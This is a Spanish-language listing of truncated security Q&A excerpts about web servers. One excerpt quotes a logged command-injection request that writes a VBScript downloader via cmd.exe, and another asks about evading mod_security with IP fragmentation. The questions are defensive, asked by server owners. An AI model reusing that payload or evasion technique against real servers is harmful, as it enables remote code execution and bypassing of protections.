Preguntas con etiqueta 'webserver'

preguntas con etiqueta
2
respuestas

Solicitud cuestionable a /user/soapCaller.bs

Mis registros del servidor web revelaron una solicitud a /user/soapCaller.bs desde 220.226.188.32, que se asigna a Mumbai, India. El agente de usuario HTTP se llama 'Morpheus * Scanner'. Mi servidor devolvió un error 404. Obviamente es un ti...
hecha 10.05.2012 - 20:18
2
respuestas

¿Cuáles son los peligros de los enlaces activos de otros sitios web?

Supongamos que hay una situación en la que site a está vinculando directamente un archivo de fuente ie https://www.example.com/FONT.woff2 desde site b . ¿Alguien podría hacer que una regla de reescritura de URL apunt...
hecha 28.09.2017 - 06:30
2
respuestas

ip-fragmentation and mod_security?

¿es posible usar ip-fragmenation (por ejemplo con fragroute) para evadir mod_security? la idea sería dividir una cadena sql-injection- o xss-string en partes pequeñas para que no se reconozca.     
hecha 04.05.2011 - 00:23
2
respuestas

solicitud http sospechosa en los registros

Encontré esta solicitud en mi Ubuntu 14.04 apache2 access.log: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%...
hecha 26.09.2014 - 02:19
3
respuestas

¿La gente objetaría mi sitio web solo porque use Google Analytics, +1 o FB Connect?

¿Hay personas que se negarán a usar un sitio web solo porque ese sitio envía información del navegador a Google Analytics? ¿Podría el botón +1 ser una bandera roja? ¿Debo esperar que haya ideas similares con respecto a Facebook Connect?  ...
hecha 18.03.2012 - 14:00
1
respuesta

carpeta y permiso de archivo.

Tengo un sitio web con una empresa de alojamiento web. Escribí una pequeña aplicación php / mysql, sin cargar archivos, solo administrando datos desde la base de datos y creando pdf con TCPDF. Hay carpetas como css y js pero nada más. Como te...
hecha 14.09.2011 - 09:25
2
respuestas

¿Debo publicar las direcciones IP que intentan dañar mi servidor web privado?

Ética y legalmente, ¿se me permite publicar direcciones IP que intentaron violar a la fuerza mi servidor LAMP? Es un sitio web / blog personal que se vuelve muy fuerte y me gustaría publicarlo en mi sitio web para hacer una publicación interesan...
hecha 25.03.2017 - 16:20
1
respuesta

¿Existen implicaciones de seguridad en la creación de una clave SSH para el usuario root?

He escrito un script de instalación en un servidor para configurar rápidamente nuevos sitios en el directorio / srv. Necesita hacer un git clone , y debe ejecutarse a través de sudo para tener los permisos para hacer todo lo que nec...
hecha 18.05.2015 - 17:25
5
respuestas

¿Cuál es una respuesta típica del servidor web para la solicitud POST?

Mi servidor web está devolviendo un 200 OK después de enviar una solicitud POST, pero no parece ser una buena idea según un equipo de seguridad. Debe devolver un 302 "Objeto movido", de modo que evite el almacenamiento en caché de información...
hecha 15.10.2015 - 19:20
3
respuestas

¿Es posible listar carpetas desde mi servidor web si tengo un index.html vacío en la carpeta raíz?

Tengo un pequeño servidor web de mangosta instalado en mi máquina. Tengo un index.html vacío en el directorio raíz. Quiero poder compartir el enlace con las personas que conozco, creando una carpeta con este aspecto: 0gzzfiz4pf80mn8dw1k3 E...
hecha 31.01.2013 - 16:45